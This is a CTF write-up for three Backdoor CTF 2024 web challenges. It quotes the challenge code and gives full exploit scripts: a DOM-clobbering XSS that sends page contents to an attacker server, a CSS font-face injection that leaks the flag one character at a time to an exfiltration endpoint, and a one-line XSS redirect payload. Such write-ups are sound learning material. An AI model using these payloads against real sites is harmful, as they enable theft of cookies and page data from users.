Backdoor CTF 2024 - writeup


✅ Cascade Chaos (187pts 32solves)


You are presented with a markdown rendering service. When you access the /convert endpoint with the content and heading parameters, the server parses the content with showdown markdown parser and displays it using the following code:

app.get("/convert", (req, res) => {
    let content = req.query.content ? req.query.content : "";
    let heading = req.query.heading ? req.query.heading : "";
    content = converter.makeHtml(content);
    res.render('markdown', {
        title: "Markdown renderer",
        heading: encodeURIComponent(heading),
        body: encodeURIComponent(content)
<!doctype html>
<html lang="en">

  <!-- snap -->
  <script src=""></script>

  <div class="heading">

    const heading = decodeURIComponent(`<%- heading -%>`);
    const headingDiv = document.querySelector(".heading");
    const content = DOMPurify.sanitize(heading);
    headingDiv.innerHTML = content;
  <div class="content">
  <button class="btn" id="showToAdminBtn">Show to Admin</button>

    const body = decodeURIComponent(`<%- body -%>`);
    const contentDiv = document.querySelector(".content");
    if (window.isSafe) {
      contentDiv.innerHTML = body;
    } else {
      const sanitizedContent = DOMPurify.sanitize(body);
      contentDiv.innerHTML = sanitizedContent;

    /* snap */



There is another server that contains the flag. This server is only accessible to the bot.
def flag():
    access_token = request.cookies.get('access_token')
    if access_token != SECRET_TOKEN:
    color = unquote(request.args.get('color', 'white'))
    return render_template('flag.html', color=color , flag=flag)
<!DOCTYPE html>
<html lang="en">
    <!-- snap  -->
        :root {
        --flag-color: {{ color|safe }};
        /* snap */
<!-- snap -->
    <div class="flag"></div>
    // Flag visibility restricted to direct access only for security reasons
    if ( === "Flag") { 
        const flagContainer = document.querySelector(".flag");    
        const flagChars = "{{ flag }}".split("");
        // Breaking the flag into pieces, because fragmented flags are harder to steal... right?
        flagChars.forEach(char => {
            const span = document.createElement("span");
            span.textContent = char; 

When the condtion === "Flag" is met, the flag is rendered like this:
alt text

When you send heading and content to the bot, the bot accesses the respective /convert endpoint.

index.js"/visit", visitLimiter, (req, res) => { 
    try {
        let heading = req.body.heading
        let content = req.body.content
        if (content == undefined) {
            return res.status(200).send("Body is not provided")
        const toReq = `${BASEURL}/convert?heading=${encodeURIComponent(heading)}&content=${encodeURIComponent(content)}`;
        const args = JSON.stringify({ url: toReq, cookie: SECRET_TOKEN });
        childProcess.spawn('node', ['./src/bot.js', args], { stdio: 'inherit' });
        return res.status(200).send("Admin will check!")
    } catch (e) {
        return res.status(500).send(e.message)
async function visit(obj) {
    let browser;
    let url = obj['url'];
    let cookie = obj['cookie'];
    try {
        browser = await puppeteer.launch({
            /* snap */
        let page = await browser.newPage();

        await page.setExtraHTTPHeaders({
            'Cookie': `access_token=${cookie}`

        await page.goto(url, { waitUntil: 'domcontentloaded', timeout: 10000 });
        await new Promise(r => setTimeout(r, 10000));
    } catch (e) {
    } finally {
        /* snap */


Step 1: DOM Clobbering

First step is to somehow run javascript code in the markdown server.

The following code shows that you can XSS if window.isSafe is met.

if (window.isSafe) {
    contentDiv.innerHTML = body;
} else {
    const sanitizedContent = DOMPurify.sanitize(body);
    contentDiv.innerHTML = sanitizedContent;

This can be done via DOM Clobbering. The heading is sanitized using DOMPurify and is inserted before the content is inserted.

const heading = decodeURIComponent(`<%- heading -%>`);
const headingDiv = document.querySelector(".heading");
const content = DOMPurify.sanitize(heading);
headingDiv.innerHTML = content;

Because DOMPurify does not delete id attribute, we can control the value of window.isSafe. Hence, if the heading is <a id='isSafe'>x</a>, window.isSafe becomes truthy, and the content is inserted without sanitization.

Step 2: Getting the flag

Now you can make the bot access the flag server in various ways, such as via an iframe, such as iframe, or location change.

By setting the color parameters, you can inject any string here:

    :root {
    --flag-color: {{ color|safe }};
    /* snap */

You can close the <style> tag and inject a <script> tag. I sent the whole content of document.body.innerHTML, which contains the flag, to my server.

Full Exploit
import base64
import requests

# URL = "http://localhost:4001/"
URL = ""
LOCAL = "http://local:4002/flag"
# LOCAL = "http://localhost:4002/flag"
EVIL = ""

js = f"""document.location.assign("{LOCAL}?color=</style><script>setTimeout(()=>document.location.assign('{EVIL}?x='%2Bbtoa(document.body.innerHTML)),1000)</script>")""".strip()
encoded = base64.b64encode(js.encode()).decode()

s = requests.session()
data = {
    "heading": "<a id='isSafe'>x</a>",
    "content": f"""<img src=X onerror="eval(atob('{encoded}'))">"""
r = + "visit", json=data)
# r = s.get(URL + "convert", params=data)
# print(r.url)

✅ Cascade Chaos Revenge (461pts 12solves)


The revenge challenge now sanitizes the content of color parameter.
--- cascade/src/local_service/    2024-12-24 02:49:01.812508288 +0900
+++ cascade_revenge/src/local_service/    2024-12-23 11:23:02.907709947 +0900
@@ -1,11 +1,19 @@
 from flask import Flask, render_template, request
 from flask import abort
 import os
+import html
+import re
 from urllib.parse import unquote
 app = Flask(__name__)
+def sanitize_css_value(value):
+    value = html.unescape(value)
+    value = re.sub(r'</?style>', '', value, flags=re.IGNORECASE)
+    value = re.sub(r'[<>]', '', value)
+    return value
 def index():
     return 'Hello, Local World!'
@@ -14,10 +22,12 @@
 def flag():
     access_token = request.cookies.get('access_token')
     if access_token != SECRET_TOKEN:
-        abort(403) 
+        abort(403)
     color = unquote(request.args.get('color', 'white'))
-    flag=os.getenv('FLAG')
-    return render_template('flag.html', color=color , flag=flag)
+    color = sanitize_css_value(color) 
+    flag = os.getenv('FLAG', 'FLAG{dummy_flag}')
+    return render_template('flag.html', color=color, flag=flag)
 if __name__ == '__main__':


We want to use CSS injection to leak the flag. To do that, we need to somehow make === "Flag" evaluate to true.

if ( === "Flag") { 
    const flagContainer = document.querySelector(".flag");    
    const flagChars = "{{ flag }}".split("");
    // Breaking the flag into pieces, because fragmented flags are harder to steal... right?
    flagChars.forEach(char => {
        const span = document.createElement("span");
        span.textContent = char; 

To achieve this, we have to open http://local:4003/flag using either <iframe name='Flag'> or, 'Flag'). Normally, sending cross-origin cookies to an iframe or via isn’t possible. However, in this challenge, sending cookies is possible because they are set using setExtraHTTPHeaders. This adds extra HTTP headers every time the Puppeteer browser makes a request.

await page.setExtraHTTPHeaders({
    'Cookie': `access_token=${cookie}`

I'm not sure why, but this wasn’t possible if I used Using an <iframe> worked just fine.

Step 2: CSS Injection

Reference: HackTricks - CSS Injection

Next, we want to leak the content of the page using CSS. We can use @font-face along with unicode-range to accomplish this.

When you define an @font-face rule with a unicode-range, the font file is only requested if characters in that range actually appear on the page.

For example, if the CSS looks like:

    font-family: 'T';
    src: url('');
span {
    font-family: 'T';

The request to only occurs if the letter A (U+0041) actually appears in a <span> element. Essentially, the browser loads that specific font resource only if the content matches the specified unicode range.

In this challenge, each <span> element contains exactly one character. By selecting each <span> tag using the :nth-child selector, we can deduce which character is present in each <span> based on whether the font is requested.

Full exploit
import threading
import urllib.parse
from flask import Flask, Response, render_template
import time
import requests
import requests
import string
import urllib

app = Flask(__name__)

REMOTE = False
# REMOTE = True

# USE_BOT = False
USE_BOT = True

URL = "" if REMOTE else "http://localhost:4004/"
LOCAL = "http://local:4003/flag" if USE_BOT or REMOTE else "http://localhost:4003/flag"
EVIL = ""

def index():
    return render_template("index.html")

def gen_css(n):
    x = [f"""@font-face{{font-family:'T';src:url('{EVIL}leak/{n}/{c}');unicode-range:U+{"{:04x}".format(ord(c))};}}"""
        for c in string.ascii_lowercase + string.digits + "_{}"]
    return "".join(x) + f""".flag span:nth-child({n+1}){{font-family: 'T';}}"""

def next(n):
    color = urllib.parse.quote("}" + gen_css(n))

    s = requests.session()
    data = {
        "heading": "<a id='isSafe'>x</a>",
        "content": f"""<iframe id=fr name=Flag src="{LOCAL}?color={color}"></iframe>"""
    if USE_BOT:
        r = + "visit", json=data)
        r = s.get(URL + "convert", params=data)

cur = ""
def leak(n, c):
    global cur
    cur += c
    print(n, c)
    next(int(n) + 1)
    return Response(status=200)

def solve():

if __name__ == "__main__":
    thread = threading.Thread(target=solve)

✅ Juggernaut (406pts 17solves)

There isn’t much to say about this challenge. You can inject an unsanitized string via the name parameter to achieve XSS (probably unintended).

    const csrf_token = "{{ csrf_token() }}";
    const rawUsername=`{{ username|safe }}`;
    const paramname=`{{name_param|safe}}`;
    /* snap */

Final payload:`;document.location.assign(%27;`&note=677181182eda6575ba9af22c49400a43